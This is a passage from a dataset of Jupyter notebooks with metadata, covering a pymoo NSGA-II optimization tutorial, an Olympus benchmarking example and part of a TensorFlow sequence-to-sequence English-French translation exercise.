hexsha
stringlengths 40
40
| size
int64 6
14.9M
| ext
stringclasses 1
value | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 6
260
| max_stars_repo_name
stringlengths 6
119
| max_stars_repo_head_hexsha
stringlengths 40
41
| max_stars_repo_licenses
sequence | max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 6
260
| max_issues_repo_name
stringlengths 6
119
| max_issues_repo_head_hexsha
stringlengths 40
41
| max_issues_repo_licenses
sequence | max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 6
260
| max_forks_repo_name
stringlengths 6
119
| max_forks_repo_head_hexsha
stringlengths 40
41
| max_forks_repo_licenses
sequence | max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | avg_line_length
float64 2
1.04M
| max_line_length
int64 2
11.2M
| alphanum_fraction
float64 0
1
| cells
sequence | cell_types
sequence | cell_type_groups
sequence |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e705c52065438e591fd50c12e3bff5fba9a27257 | 89,225 | ipynb | Jupyter Notebook | source/getting_started/part_2.ipynb | SunTzunami/pymoo-doc | f82d8908fe60792d49a7684c4bfba4a6c1339daf | [
"Apache-2.0"
] | 2 | 2021-09-11T06:43:49.000Z | 2021-11-10T13:36:09.000Z | source/getting_started/part_2.ipynb | SunTzunami/pymoo-doc | f82d8908fe60792d49a7684c4bfba4a6c1339daf | [
"Apache-2.0"
] | 3 | 2021-09-21T14:04:47.000Z | 2022-03-07T13:46:09.000Z | source/getting_started/part_2.ipynb | SunTzunami/pymoo-doc | f82d8908fe60792d49a7684c4bfba4a6c1339daf | [
"Apache-2.0"
] | 3 | 2021-10-09T02:47:26.000Z | 2022-02-10T07:02:37.000Z | 169.952381 | 38,684 | 0.862763 | [
[
[
".. meta::\n :description: A guide which introduces the most important steps to get started with pymoo, an open-source multi-objective optimization framework in Python.",
"_____no_output_____"
],
[
".. meta::\n :keywords: Multi-objective Optimization, Python, Evolutionary Computation, Optimization Test Problem, Hypervolume",
"_____no_output_____"
]
],
[
[
".. _nb_getting_started_part2:",
"_____no_output_____"
]
],
[
[
"# Part II: Find a Solution Set using Multi-objective Optimization",
"_____no_output_____"
],
[
"The constrained bi-objective problem from Part I was defined by",
"_____no_output_____"
],
[
"\\begin{align} \n\\begin{split}\n\\min \\;\\; & f_1(x) = 100 \\, (x_1^2 + x_2^2) \\\\ \n\\max \\;\\; & f_2(x) = -(x_1-1)^2 - x_2^2 \\\\[1mm]\n\\text{s.t.} \\;\\; & g_1(x) = 2 \\, (x_1 - 0.1) \\, (x_1 - 0.9) \\leq 0\\\\ \n& g_2(x) = 20 \\, (x_1 - 0.4) \\, (x_1 - 0.6) \\geq 0\\\\[1mm] \n& -2 \\leq x_1 \\leq 2 \\\\\n& -2 \\leq x_2 \\leq 2\\\\[1mm] \n& x \\in \\mathbb{R}\n\\end{split}\n\\end{align}",
"_____no_output_____"
],
[
"To implement the problem in **pymoo** some more work has to be done. ",
"_____no_output_____"
]
],
[
[
".. admonition:: Problem Definition\n :class: myOwnStyle\n\n Most optimization frameworks commit to either minimize or maximize all objectives and to have only :math:`\\leq` or :math:`\\geq` constraints. In pymoo, each objective function is supposed to be **minimized**, and each constraint needs to be provided in the form of :math:`\\leq 0`.",
"_____no_output_____"
]
],
[
[
"Thus, we need to multiple an objective that is supposed to be maximized by $-1$ and minimize it. This results in minimizing $-f_2(x)$ instead of maximizing $f_2(x)$. \n\nMoreover, the inequality constraints need to be formulated as **less than zero** ($\\leq 0$) constraint. \nFor this reason, $g_2(x)$ is multiplied by $-1$ in order to flip inequality relation. \nAlso, we recommend the normalization of constraints to make them operating on the same scale and giving them equal importance. For $g_1(x)$, the coefficient results in $2 \\cdot (-0.1) \\cdot (-0.9) = 0.18$ and for $g_2(x)$ in $20 \\cdot (-0.4) \\cdot (-0.6) = 4.8$, respectively. We achieve normalization of constraints by dividing $g_1(x)$ and $g_2(x)$ by its corresponding coefficient.",
"_____no_output_____"
],
[
"After these reformulations the problem to be implemented is given by:\n\n\\begin{align} \n\\label{eq:getting_started_pymoo}\n\\begin{split}\n\\min \\;\\; & f_1(x) = 100 \\, (x_1^2 + x_2^2) \\\\ \n\\min \\;\\; & f_2(x) = (x_1-1)^2 + x_2^2 \\\\[1mm] \n\\text{s.t.} \\;\\; & g_1(x) = 2 \\, (x_1 - 0.1) \\, (x_1 - 0.9) \\, / \\, 0.18 \\leq 0\\\\ \n& g_2(x) = - 20 \\, (x_1 - 0.4) \\, (x_1 - 0.6) \\, / \\, 4.8 \\leq 0\\\\[1mm] \n& -2 \\leq x_1 \\leq 2 \\\\\n& -2 \\leq x_2 \\leq 2\\\\[1mm] \n& x \\in \\mathbb{R}\n\\end{split}\n\\end{align}\n\n",
"_____no_output_____"
],
[
"## Implement the Problem",
"_____no_output_____"
],
[
"After having formulated the problem the right way, we can start implementing it. In this tutorial we the element-wise problem definition, which is one out of three different ways for implementing a problem. We define a new Python objective inheriting from `ElementwiseProblem` and set the correct attributes, such as the number of objectives (`n_obj`) and constraints (`n_constr`) and the lower (`xl`) and upper bounds (`xu`). The function being responsible for the evaluation is `_evaluate` which shall be implemented next. The function's interface is the parameters `x` and `out`. For this element-wise implementation `x` is a **one**-dimensional NumPy array of length `n_var` which represents a single solution to be evaluated. The output is supposed to be written to the dictionary `out`. The objective values should be written to `out[\"F\"]` as a list of NumPy array with length of `n_obj` and the constraints to `out[\"G\"]` with length of `n_constr` (if the problem has constraints to be satisfied at all).",
"_____no_output_____"
]
],
[
[
"import numpy as np\nfrom pymoo.core.problem import ElementwiseProblem\n\nclass MyProblem(ElementwiseProblem):\n\n def __init__(self):\n super().__init__(n_var=2, \n n_obj=2, \n n_constr=2, \n xl=np.array([-2,-2]), \n xu=np.array([2,2]))\n\n def _evaluate(self, x, out, *args, **kwargs):\n f1 = 100 * (x[0]**2 + x[1]**2)\n f2 = (x[0]-1)**2 + x[1]**2\n \n g1 = 2*(x[0]-0.1) * (x[0]-0.9) / 0.18\n g2 = - 20*(x[0]-0.4) * (x[0]-0.6) / 4.8\n \n out[\"F\"] = [f1, f2]\n out[\"G\"] = [g1, g2]\n \n\nproblem = MyProblem()",
"_____no_output_____"
]
],
[
[
".. tip::\n A problem can be defined in a couple of different ways. Above, the implementation of an **element-wise** implementation is demonstrated, which means the `_evaluate` is called for each solution `x` at a time. Other ways of implementing a problem are **vectorized**, where `x` represents a whole set of solutions or a **functional** and probably more pythonic way by providing for each objective and constraint as a function. For more details, please have a look at the Problem tutorial.",
"_____no_output_____"
]
],
[
[
"If you use **pymoo** as a researcher trying to improve existing algorithms, you might want to have a look at the varierity of single- and many-objective optimization test problems already implemented. ",
"_____no_output_____"
],
[
"[Optimization Test Problems](../problems/index.ipynb) | \n[Define a Custom Problem](../problems/definition.ipynb) | \n[Parallelization](../problems/parallelization.ipynb) |\n[Callback](../interface/callback.ipynb) |\n[Constraint Handling](../misc/constraints.ipynb)",
"_____no_output_____"
],
[
"## Initialize an Algorithm",
"_____no_output_____"
],
[
"The reason why you became aware of this framework, is probably the existence of an algorithm you like to use. \n*pymoo* follows an object oriented approach and, thus, we have to define an algorithm object next. \nDepending on the optimization problem, different algorithms will perform better or worse on different kind of problems. It is recommendable to first understand the intuition behind an algorithm and then select one which seems to be most suitable for solving your optimization problem. A list of algorithms which are available in *pymoo* is available [here](../algorithms/index.ipynb).",
"_____no_output_____"
],
[
"In our case, the optimization problem is rather simple, but the aspect of having two objectives and two constraints should be considered. Thus, let us select the well-known multi-objective algorithm [NSGA-II](../algorithms/moo/nsga2.ipynb). \nFor the majority of algorithms you could either choose the default hyper-parameters or create your own version of the algorithm by modifying them.\nFor instance, for this relatively simple problem we choose a population size of 40 (`pop_size=40`) and with only 10 (`n_offsprings=10`) in each generation. \nSuch an implementation is a greedier variant and improves the convergence of simpler optimization problems without major difficulties regarding optimization, such as the existence of local Pareto-fronts.\nMoreover, we enable a duplicate check (`eliminate_duplicates=True`), making sure that the mating produces offsprings that are different from themselves and the existing population regarding their design space values. ",
"_____no_output_____"
]
],
[
[
"from pymoo.algorithms.moo.nsga2 import NSGA2\nfrom pymoo.factory import get_sampling, get_crossover, get_mutation\n\nalgorithm = NSGA2(\n pop_size=40,\n n_offsprings=10,\n sampling=get_sampling(\"real_random\"),\n crossover=get_crossover(\"real_sbx\", prob=0.9, eta=15),\n mutation=get_mutation(\"real_pm\", eta=20),\n eliminate_duplicates=True\n)\n",
"_____no_output_____"
]
],
[
[
"The `algorithm` object contains an implementation of NSGA-II with the custom configuration discussed above. The object can now be used to start an optimization run.",
"_____no_output_____"
]
],
[
[
".. tip::\n The documentation is designed to make it easy to get started and to copy code for each of the algorithms. However, please be aware that each algorithm comes with all kinds of hyper-parameters to be considered. If an algorithm turns out not to show a good convergence behavior, we encourage you to try different algorithm configurations. For instance, for population-based approaches the population size and number of offsprings, as well as the parameters used for recombination operators are a good starting point.",
"_____no_output_____"
]
],
[
[
"## Define a Termination Criterion\n\nFurthermore, a termination criterion needs to be defined to start the optimization procedure. Most common ways of defining the termination is by limiting the overall number of function evaluations or simply the number of iterations of the algorithm.\nMoreover, some algorithms already have implemented their own, for instance Nelder-Mead when the simplex becomes degenerated or CMA-ES where a vendor library is used. \nBecause of the simplicity of this problem we use a rather small number of 40 iteration of the algorithm. ",
"_____no_output_____"
]
],
[
[
"from pymoo.factory import get_termination\n\ntermination = get_termination(\"n_gen\", 40)",
"_____no_output_____"
]
],
[
[
".. tip::\n A convergence analysis will show how much progress an algorithm has made at what time. Always keep in mind that having the most suitable algorithm but running it not long enough might prevent from finding the global optimum. However, continuing with optimization of an algorithm that got stuck or has already found the optimum will not improve the best found solution and unnecessarily increase the number of function evaluations.",
"_____no_output_____"
],
[
"You can find a list and explanations of termination criteria available in *pymoo* [here](../interface/termination.ipynb). If no termination criteria is defined, then the progress in the design and objective space will kept track of in each iteration. When no significant progress has been made (this is the art of defining what that shall be), the algorithm terminates. ",
"_____no_output_____"
],
[
"## Optimize",
"_____no_output_____"
],
[
"Finally, we are solving the `problem` with the `algorithm` and `termination` we have defined. The functional interface uses the `minimize` method. By default, the `minimize` performs deep-copies of the algorithm and the termination object which guarantees they are not modified during the function call. This is important to ensure that repetitive function calls with the same random seed end up with the same results. When the algorithm has been terminated, the `minimize` function returns a [Result](../interface/result.ipynb) object.",
"_____no_output_____"
]
],
[
[
"from pymoo.optimize import minimize\n\nres = minimize(problem,\n algorithm,\n termination,\n seed=1,\n save_history=True,\n verbose=True)\n\nX = res.X\nF = res.F",
"=====================================================================================\nn_gen | n_eval | cv (min) | cv (avg) | n_nds | eps | indicator \n=====================================================================================\n 1 | 40 | 0.00000E+00 | 2.36399E+01 | 1 | - | -\n 2 | 50 | 0.00000E+00 | 1.15486E+01 | 1 | 0.00000E+00 | f\n 3 | 60 | 0.00000E+00 | 5.277918607 | 1 | 0.00000E+00 | f\n 4 | 70 | 0.00000E+00 | 2.406068542 | 2 | 1.000000000 | ideal\n 5 | 80 | 0.00000E+00 | 0.908316880 | 3 | 0.869706146 | ideal\n 6 | 90 | 0.00000E+00 | 0.264746300 | 3 | 0.00000E+00 | f\n 7 | 100 | 0.00000E+00 | 0.054063822 | 4 | 0.023775686 | ideal\n 8 | 110 | 0.00000E+00 | 0.003060876 | 5 | 0.127815454 | ideal\n 9 | 120 | 0.00000E+00 | 0.00000E+00 | 6 | 0.085921728 | ideal\n 10 | 130 | 0.00000E+00 | 0.00000E+00 | 7 | 0.015715204 | f\n 11 | 140 | 0.00000E+00 | 0.00000E+00 | 8 | 0.015076323 | f\n 12 | 150 | 0.00000E+00 | 0.00000E+00 | 7 | 0.026135665 | f\n 13 | 160 | 0.00000E+00 | 0.00000E+00 | 10 | 0.010026699 | f\n 14 | 170 | 0.00000E+00 | 0.00000E+00 | 11 | 0.011833783 | f\n 15 | 180 | 0.00000E+00 | 0.00000E+00 | 12 | 0.008294035 | f\n 16 | 190 | 0.00000E+00 | 0.00000E+00 | 14 | 0.006095993 | ideal\n 17 | 200 | 0.00000E+00 | 0.00000E+00 | 17 | 0.002510398 | ideal\n 18 | 210 | 0.00000E+00 | 0.00000E+00 | 20 | 0.003652660 | f\n 19 | 220 | 0.00000E+00 | 0.00000E+00 | 20 | 0.010131820 | nadir\n 20 | 230 | 0.00000E+00 | 0.00000E+00 | 21 | 0.005676014 | f\n 21 | 240 | 0.00000E+00 | 0.00000E+00 | 25 | 0.010464402 | f\n 22 | 250 | 0.00000E+00 | 0.00000E+00 | 25 | 0.000547515 | f\n 23 | 260 | 0.00000E+00 | 0.00000E+00 | 28 | 0.001050255 | f\n 24 | 270 | 0.00000E+00 | 0.00000E+00 | 33 | 0.003841298 | f\n 25 | 280 | 0.00000E+00 | 0.00000E+00 | 37 | 0.006664377 | nadir\n 26 | 290 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000963164 | f\n 27 | 300 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000678243 | f\n 28 | 310 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000815766 | f\n 29 | 320 | 0.00000E+00 | 0.00000E+00 | 40 | 0.001500814 | f\n 30 | 330 | 0.00000E+00 | 0.00000E+00 | 40 | 0.014706442 | nadir\n 31 | 340 | 0.00000E+00 | 0.00000E+00 | 40 | 0.003554320 | ideal\n 32 | 350 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000624123 | f\n 33 | 360 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000203925 | f\n 34 | 370 | 0.00000E+00 | 0.00000E+00 | 40 | 0.001048509 | f\n 35 | 380 | 0.00000E+00 | 0.00000E+00 | 40 | 0.001121103 | f\n 36 | 390 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000664461 | f\n 37 | 400 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000761066 | f\n 38 | 410 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000521906 | f\n 39 | 420 | 0.00000E+00 | 0.00000E+00 | 40 | 0.004652095 | nadir\n 40 | 430 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000287847 | f\n"
]
],
[
[
"If the `verbose=True`, some printouts during the algorithm's execution are provided. This can vary from algorithm to algorithm. Here, we execute `NSGA2` on a problem where *pymoo* has no knowledge about the optimum. Each line represents one iteration. The first two columns are the current generation counter and the number of evaluations so far. For constrained problems, the next two columns show the minimum constraint violation (*cv (min)*) and the average constraint violation (*cv (avg)*) in the current population. This is followed by the number of non-dominated solutions (*n_nds*) and two more metrics which represents the movement in the objective space. ",
"_____no_output_____"
]
],
[
[
".. tip::\n An algorithm can be executed by using the **minimize** interface as shown below. In order to have more control over the algorithm execution, pymoo also offers an **object-oriented** execution. For an example and a discussion of each's pros and cons, please consult or algorithm tutorial. ",
"_____no_output_____"
]
],
[
[
"## Visualize",
"_____no_output_____"
],
[
"Analyzing the solutions being found by the algorithm is vital. Always a good start is visualizing the solutions to get a grasp of commonalities or if the Pareto-front is known to even check the convergence.",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\nxl, xu = problem.bounds()\nplt.figure(figsize=(7, 5))\nplt.scatter(X[:, 0], X[:, 1], s=30, facecolors='none', edgecolors='r')\nplt.xlim(xl[0], xu[0])\nplt.ylim(xl[1], xu[1])\nplt.title(\"Design Space\")\nplt.show()",
"_____no_output_____"
],
[
"plt.figure(figsize=(7, 5))\nplt.scatter(F[:, 0], F[:, 1], s=30, facecolors='none', edgecolors='blue')\nplt.title(\"Objective Space\")\nplt.show()",
"_____no_output_____"
]
]
] | [
"markdown",
"raw",
"markdown",
"raw",
"markdown",
"code",
"raw",
"markdown",
"code",
"markdown",
"raw",
"markdown",
"code",
"markdown",
"code",
"markdown",
"raw",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"raw"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"raw"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"raw"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"raw"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"raw"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
]
] |
e705d34b29532d9f8c2af7e76f0006079c28f4e7 | 51,777 | ipynb | Jupyter Notebook | notebooks/.ipynb_checkpoints/model_inspection-checkpoint.ipynb | gs246/Causal.jl | a667a24638415710333af760409566cc6f5dc681 | [
"MIT"
] | 56 | 2020-02-16T17:13:10.000Z | 2020-08-21T04:43:59.000Z | notebooks/.ipynb_checkpoints/model_inspection-checkpoint.ipynb | gs246/Causal.jl | a667a24638415710333af760409566cc6f5dc681 | [
"MIT"
] | 26 | 2020-08-24T07:48:01.000Z | 2022-02-21T07:07:21.000Z | notebooks/.ipynb_checkpoints/model_inspection-checkpoint.ipynb | gs246/Causal.jl | a667a24638415710333af760409566cc6f5dc681 | [
"MIT"
] | 8 | 2020-09-01T18:08:14.000Z | 2022-03-22T12:33:06.000Z | 92.294118 | 838 | 0.591363 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
e705d51cf88dfa476d99b81130f6f592c1530ad3 | 35,674 | ipynb | Jupyter Notebook | docs/source/examples/notebooks/simple_benchmark.ipynb | priyansh-1902/olympus | f57ad769918c0d5d805c439ab5ffbd180af698fa | [
"MIT"
] | 36 | 2020-10-10T14:05:40.000Z | 2022-02-12T07:21:47.000Z | docs/source/examples/notebooks/simple_benchmark.ipynb | priyansh-1902/olympus | f57ad769918c0d5d805c439ab5ffbd180af698fa | [
"MIT"
] | 12 | 2020-10-14T09:04:06.000Z | 2021-10-01T19:25:34.000Z | docs/source/examples/notebooks/simple_benchmark.ipynb | priyansh-1902/olympus | f57ad769918c0d5d805c439ab5ffbd180af698fa | [
"MIT"
] | 8 | 2020-10-24T12:43:45.000Z | 2022-02-12T07:21:50.000Z | 258.507246 | 33,080 | 0.930201 | [
[
[
"# Run a simple benchmark",
"_____no_output_____"
]
],
[
[
"# import olympus\nfrom olympus import Olympus\nfrom olympus import Campaign",
"_____no_output_____"
],
[
"# create olympus\nolymp = Olympus()",
"_____no_output_____"
],
[
"# run olympus for specific experimentation scenario\nolymp.run(dataset='alkox', planner='hyperopt', campaign=Campaign())",
"\u001b[0;37m[INFO] Loading emulator using a BayesNeuralNet model for the dataset alkox...\n\u001b[0m"
],
[
"# run olympus with another planner\nolymp.run(dataset='alkox', planner='gpyopt', campaign=Campaign())",
"\u001b[0;37m[INFO] Loading emulator using a BayesNeuralNet model for the dataset alkox...\n\u001b[0m"
]
],
[
[
"### Plot results",
"_____no_output_____"
]
],
[
[
"from olympus import Plotter",
"_____no_output_____"
],
[
"plotter = Plotter()\nplotter.plot_from_db(olymp.evaluator.database)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e705d6f46d6851d0795de57d36820f3be22249ca | 209,065 | ipynb | Jupyter Notebook | dlnd_language_translation.ipynb | Arish813/Language-translation-using-RNN | d6dc6862d38cf3f732e1d0b3b3c50837a66dd060 | [
"MIT"
] | null | null | null | dlnd_language_translation.ipynb | Arish813/Language-translation-using-RNN | d6dc6862d38cf3f732e1d0b3b3c50837a66dd060 | [
"MIT"
] | null | null | null | dlnd_language_translation.ipynb | Arish813/Language-translation-using-RNN | d6dc6862d38cf3f732e1d0b3b3c50837a66dd060 | [
"MIT"
] | null | null | null | 75.095187 | 577 | 0.617803 | [
[
[
"# Language Translation\nIn this project, you’re going to take a peek into the realm of neural network machine translation. You’ll be training a sequence to sequence model on a dataset of English and French sentences that can translate new sentences from English to French.\n## Get the Data\nSince translating the whole language of English to French will take lots of time to train, we have provided you with a small portion of the English corpus.",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport helper\nimport problem_unittests as tests\n\nsource_path = 'data/small_vocab_en'\ntarget_path = 'data/small_vocab_fr'\nsource_text = helper.load_data(source_path)\ntarget_text = helper.load_data(target_path)",
"_____no_output_____"
]
],
[
[
"## Explore the Data\nPlay around with view_sentence_range to view different parts of the data.",
"_____no_output_____"
]
],
[
[
"view_sentence_range = (0, 10)\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport numpy as np\n\nprint('Dataset Stats')\nprint('Roughly the number of unique words: {}'.format(len({word: None for word in source_text.split()})))\n\nsentences = source_text.split('\\n')\nword_counts = [len(sentence.split()) for sentence in sentences]\nprint('Number of sentences: {}'.format(len(sentences)))\nprint('Average number of words in a sentence: {}'.format(np.average(word_counts)))\n\nprint()\nprint('English sentences {} to {}:'.format(*view_sentence_range))\nprint('\\n'.join(source_text.split('\\n')[view_sentence_range[0]:view_sentence_range[1]]))\nprint()\nprint('French sentences {} to {}:'.format(*view_sentence_range))\nprint('\\n'.join(target_text.split('\\n')[view_sentence_range[0]:view_sentence_range[1]]))",
"Dataset Stats\nRoughly the number of unique words: 227\nNumber of sentences: 137861\nAverage number of words in a sentence: 13.225277634719028\n\nEnglish sentences 0 to 10:\nnew jersey is sometimes quiet during autumn , and it is snowy in april .\nthe united states is usually chilly during july , and it is usually freezing in november .\ncalifornia is usually quiet during march , and it is usually hot in june .\nthe united states is sometimes mild during june , and it is cold in september .\nyour least liked fruit is the grape , but my least liked is the apple .\nhis favorite fruit is the orange , but my favorite is the grape .\nparis is relaxing during december , but it is usually chilly in july .\nnew jersey is busy during spring , and it is never hot in march .\nour least liked fruit is the lemon , but my least liked is the grape .\nthe united states is sometimes busy during january , and it is sometimes warm in november .\n\nFrench sentences 0 to 10:\nnew jersey est parfois calme pendant l' automne , et il est neigeux en avril .\nles états-unis est généralement froid en juillet , et il gèle habituellement en novembre .\ncalifornia est généralement calme en mars , et il est généralement chaud en juin .\nles états-unis est parfois légère en juin , et il fait froid en septembre .\nvotre moins aimé fruit est le raisin , mais mon moins aimé est la pomme .\nson fruit préféré est l'orange , mais mon préféré est le raisin .\nparis est relaxant en décembre , mais il est généralement froid en juillet .\nnew jersey est occupé au printemps , et il est jamais chaude en mars .\nnotre fruit est moins aimé le citron , mais mon moins aimé est le raisin .\nles états-unis est parfois occupé en janvier , et il est parfois chaud en novembre .\n"
]
],
[
[
"## Implement Preprocessing Function\n### Text to Word Ids\nAs you did with other RNNs, you must turn the text into a number so the computer can understand it. In the function `text_to_ids()`, you'll turn `source_text` and `target_text` from words to ids. However, you need to add the `<EOS>` word id at the end of each sentence from `target_text`. This will help the neural network predict when the sentence should end.\n\nYou can get the `<EOS>` word id by doing:\n```python\ntarget_vocab_to_int['<EOS>']\n```\nYou can get other word ids using `source_vocab_to_int` and `target_vocab_to_int`.",
"_____no_output_____"
]
],
[
[
"def text_to_ids(source_text, target_text, source_vocab_to_int, target_vocab_to_int):\n \"\"\"\n Convert source and target text to proper word ids\n :param source_text: String that contains all the source text.\n :param target_text: String that contains all the target text.\n :param source_vocab_to_int: Dictionary to go from the source words to an id\n :param target_vocab_to_int: Dictionary to go from the target words to an id\n :return: A tuple of lists (source_id_text, target_id_text)\n \"\"\"\n # TODO: Implement Function\n eos= source_vocab_to_int['<EOS>']\n source_id_text= [[source_vocab_to_int[word] for word in sentence.split()]\\\n for sentence in source_text.split('\\n')]\n target_id_text= [[target_vocab_to_int[word] for word in sentence.split()]+[eos]\\\n for sentence in target_text.split('\\n')]\n return source_id_text,target_id_text\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_text_to_ids(text_to_ids)",
"Tests Passed\n"
]
],
[
[
"### Preprocess all the data and save it\nRunning the code cell below will preprocess all the data and save it to file.",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nhelper.preprocess_and_save_data(source_path, target_path, text_to_ids)",
"_____no_output_____"
]
],
[
[
"# Check Point\nThis is your first checkpoint. If you ever decide to come back to this notebook or have to restart the notebook, you can start from here. The preprocessed data has been saved to disk.",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport numpy as np\nimport helper\n\n(source_int_text, target_int_text), (source_vocab_to_int, target_vocab_to_int), _ = helper.load_preprocess()",
"_____no_output_____"
]
],
[
[
"### Check the Version of TensorFlow and Access to GPU\nThis will check to make sure you have the correct version of TensorFlow and access to a GPU",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nfrom distutils.version import LooseVersion\nimport warnings\nimport tensorflow as tf\n\n# Check TensorFlow Version\nassert LooseVersion(tf.__version__) in [LooseVersion('1.0.0'), LooseVersion('1.0.1')], 'This project requires TensorFlow version 1.0 You are using {}'.format(tf.__version__)\nprint('TensorFlow Version: {}'.format(tf.__version__))\n\n# Check for a GPU\nif not tf.test.gpu_device_name():\n warnings.warn('No GPU found. Please use a GPU to train your neural network.')\nelse:\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))",
"TensorFlow Version: 1.0.0\nDefault GPU Device: /gpu:0\n"
],
[
"print(tf.__version__)",
"1.0.0\n"
]
],
[
[
"## Build the Neural Network\nYou'll build the components necessary to build a Sequence-to-Sequence model by implementing the following functions below:\n- `model_inputs`\n- `process_decoding_input`\n- `encoding_layer`\n- `decoding_layer_train`\n- `decoding_layer_infer`\n- `decoding_layer`\n- `seq2seq_model`\n\n### Input\nImplement the `model_inputs()` function to create TF Placeholders for the Neural Network. It should create the following placeholders:\n\n- Input text placeholder named \"input\" using the TF Placeholder name parameter with rank 2.\n- Targets placeholder with rank 2.\n- Learning rate placeholder with rank 0.\n- Keep probability placeholder named \"keep_prob\" using the TF Placeholder name parameter with rank 0.\n\nReturn the placeholders in the following the tuple (Input, Targets, Learing Rate, Keep Probability)",
"_____no_output_____"
]
],
[
[
"def model_inputs():\n \"\"\"\n Create TF Placeholders for input, targets, and learning rate.\n :return: Tuple (input, targets, learning rate, keep probability)\n \"\"\"\n # TODO: Implement Function\n inputs=tf.placeholder(tf.int32,[None,None],name='input')\n targets=tf.placeholder(tf.int32,[None,None],name='target')\n learning_rate=tf.placeholder(tf.float32,name=\"learning_rate\")\n keep_prob=tf.placeholder(tf.float32,name=\"keep_prob\")\n return inputs, targets, learning_rate, keep_prob\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_model_inputs(model_inputs)",
"Tests Passed\n"
]
],
[
[
"### Process Decoding Input\nImplement `process_decoding_input` using TensorFlow to remove the last word id from each batch in `target_data` and concat the GO ID to the beginning of each batch.",
"_____no_output_____"
]
],
[
[
"def process_decoding_input(target_data, target_vocab_to_int, batch_size):\n \"\"\"\n Preprocess target data for decoding\n :param target_data: Target Placeholder\n :param target_vocab_to_int: Dictionary to go from the target words to an id\n :param batch_size: Batch Size\n :return: Preprocessed target data\n \"\"\"\n # TODO: Implement Function\n last=tf.strided_slice(target_data,[0,0],[batch_size,-1],[1,1])\n target_data=tf.concat([tf.fill([batch_size, 1], target_vocab_to_int['<GO>']), last], 1)\n return target_data\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_process_decoding_input(process_decoding_input)",
"Tests Passed\n"
]
],
[
[
"### Encoding\nImplement `encoding_layer()` to create a Encoder RNN layer using [`tf.nn.dynamic_rnn()`](https://www.tensorflow.org/api_docs/python/tf/nn/dynamic_rnn).",
"_____no_output_____"
]
],
[
[
"def encoding_layer(rnn_inputs, rnn_size, num_layers, keep_prob):\n \"\"\"\n Create encoding layer\n :param rnn_inputs: Inputs for the RNN\n :param rnn_size: RNN Size\n :param num_layers: Number of layers\n :param keep_prob: Dropout keep probability\n :return: RNN state\n \"\"\"\n # TODO: Implement Function\n lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size)\n cell = tf.contrib.rnn.MultiRNNCell([lstm]*num_layers)\n cell = tf.contrib.rnn.DropoutWrapper(cell,output_keep_prob=keep_prob)\n output, rnn_state = tf.nn.dynamic_rnn(cell,rnn_inputs,dtype=tf.float32)\n return rnn_state\n \n #Above code was throwing a ValueError for version 1.1.0: \n # Attempt to reuse RNNCell with a different variable\n # scope than its first use\n # for the above code\n #multicell = tf.contrib.rnn.MultiRNNCell([tf.contrib.rnn.DropoutWrapper(tf.contrib.rnn.BasicLSTMCell(rnn_size),\\\n # output_keep_prob=keep_prob) for _ in range(num_layers)])\n #outputs,state=tf.nn.dynamic_rnn(multicell,rnn_inputs,dtype=tf.float32)\n #return state\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_encoding_layer(encoding_layer)",
"Tests Passed\n"
]
],
[
[
